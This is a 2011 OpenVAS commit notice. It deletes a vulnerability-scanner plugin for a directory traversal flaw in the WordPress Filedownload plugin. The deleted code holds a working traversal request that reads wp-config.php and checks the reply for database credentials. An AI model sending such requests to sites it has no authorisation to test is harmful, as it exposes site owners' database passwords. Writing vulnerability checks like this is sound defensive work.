[Openvas-commits] r12130 - in trunk/openvas-plugins: . scripts

scm-commit@wald.intevation.org scm-commit at wald.intevation.org
Thu Nov 17 11:49:31 CET 2011


Author: mime
Date: 2011-11-17 11:49:14 +0100 (Thu, 17 Nov 2011)
New Revision: 12130

Removed:
   trunk/openvas-plugins/scripts/secpod_wordpress_filedownload_remote_file_disc_vuln.nasl
Modified:
   trunk/openvas-plugins/ChangeLog
Log:
Deleted because this is alredy covered in gb_wordpress_49669.nasl

Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog	2011-11-17 10:36:14 UTC (rev 12129)
+++ trunk/openvas-plugins/ChangeLog	2011-11-17 10:49:14 UTC (rev 12130)
@@ -1,3 +1,9 @@
+2011-11-17  Michael Meyer <michael.meyer at greenbone.net>
+
+	* scripts/secpod_wordpress_filedownload_remote_file_disc_vuln.nasl:
+	Deleted because this is alredy covered in
+	gb_wordpress_49669.nasl.
+
 2011-11-17  Antu Sanadi <santu at secpod.com>
 
 	* scripts/gb_oracle_java_se_mult_vuln_oct11_win_01.nasl,

Deleted: trunk/openvas-plugins/scripts/secpod_wordpress_filedownload_remote_file_disc_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_wordpress_filedownload_remote_file_disc_vuln.nasl	2011-11-17 10:36:14 UTC (rev 12129)
+++ trunk/openvas-plugins/scripts/secpod_wordpress_filedownload_remote_file_disc_vuln.nasl	2011-11-17 10:49:14 UTC (rev 12130)
@@ -1,111 +0,0 @@
-###############################################################################
-# OpenVAS Vulnerability Test
-# $Id: secpod_wordpress_filedownload_remote_file_disc_vuln.nasl 17195 2011-11-17 12:30:17Z sep $
-#
-# WordPress Filedownload Plugin (download.php) Remote File Disclosure Vulnerability
-#
-# Authors:
-# Madhuri D <dmadhuri at secpod.com>
-#
-# Copyright:
-# Copyright (c) 2011 SecPod, http://www.secpod.com
-#
-# This program is free software; you can redistribute it and/or modify
-# it under the terms of the GNU General Public License version 2
-# (or any later version), as published by the Free Software Foundation.
-#
-# This program is distributed in the hope that it will be useful,
-# but WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-# GNU General Public License for more details.
-#
-# You should have received a copy of the GNU General Public License
-# along with this program; if not, write to the Free Software
-# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
-###############################################################################
-
-if(description)
-{
-  script_id(902753);
-  script_version("$Revision$");
-  script_tag(name:"cvss_base", value:"7.5");
-  script_tag(name:"risk_factor", value:"High");
-  script_tag(name:"last_modification", value:"$Date$");
-  script_tag(name:"creation_date", value:"2011-11-17 12:30:17 +0530 (Thu, 17 Nov 2011)");
-  script_name("WordPress Filedownload Plugin (download.php) Remote File Disclosure Vulnerability");
-  desc = "
-  Overview:
-  This host is installed with WordPress Filedownload Plugin and is prone to
-  remote file disclosure vulnerability.
-
-  Vulnerability Insight:
-  Input passed to the 'path' parameter in
-  'wp-content/plugins/filedownload/download.php' is not properly verified
-  before being used to download files. This can be exploited to disclose
-  the contents of arbitrary files via directory traversal attacks.
-
-  Impact:
-  Successful exploitation could allow attackers to perform directory traversal
-  attacks and read arbitrary files on the affected application.
-
-  Impact Level: Application
-
-  Affected Software/OS:
-  WordPress Filedownload Plugin version 0.1
-
-  Fix: No solution or patch is available as on 17th November, 2011. Information
-  regarding this issue will be updated once the solution details are available.
-  For updates refer, http://wordpress.org/extend/plugins/filedownload/
-
-  References:
-  http://secunia.com/advisories/46047/
-  http://www.exploit-db.com/exploits/17858/
-  http://securityreason.com/exploitalert/10856
-  http://www.securelist.com/en/advisories/46047 ";
-
-  script_description(desc);
-  script_summary("Check Remote File Disclosure vulnerability in WordPress Filedownload Plugin");
-  script_category(ACT_ATTACK);
-  script_copyright("Copyright (C) 2011 SecPod");
-  script_family("Web application abuses");
-  script_dependencies("secpod_wordpress_detect_900182.nasl");
-  script_require_ports("Services/www", 80);
-  exit(0);
-}
-
-##
-## The script code starts here
-##
-
-include("http_func.inc");
-include("host_details.inc");
-include("version_func.inc");
-include("http_keepalive.inc");
-
-## Get HTTP Port
-port = get_http_port(default:80);
-if(!port){
-  exit(0);
-}
-
-## Check Host Supports PHP
-if(!can_host_php(port:port)){
-  exit(0);
-}
-
-## Get WordPress Installed Location
-if(!dir = get_dir_from_kb(port:port, app:"WordPress")){
-  exit(0);
-}
-
-## Construct an attack
-url = string(dir, "/wp-content/plugins/filedownload/download.php/?path=" +
-                     "../../../wp-config.php");
-
-## Confirm exploit worked properly or not
-if(http_vuln_check(port:port, url:url,pattern:"The base configurations of" +
-                      " the WordPress", extra_check:make_list("MySQL settings",
-                      "DB_NAME", "DB_USER", "DB_PASSWORD"))) {
-  security_hole(port:port);
-  exit(0);
-}



More information about the Openvas-commits mailing list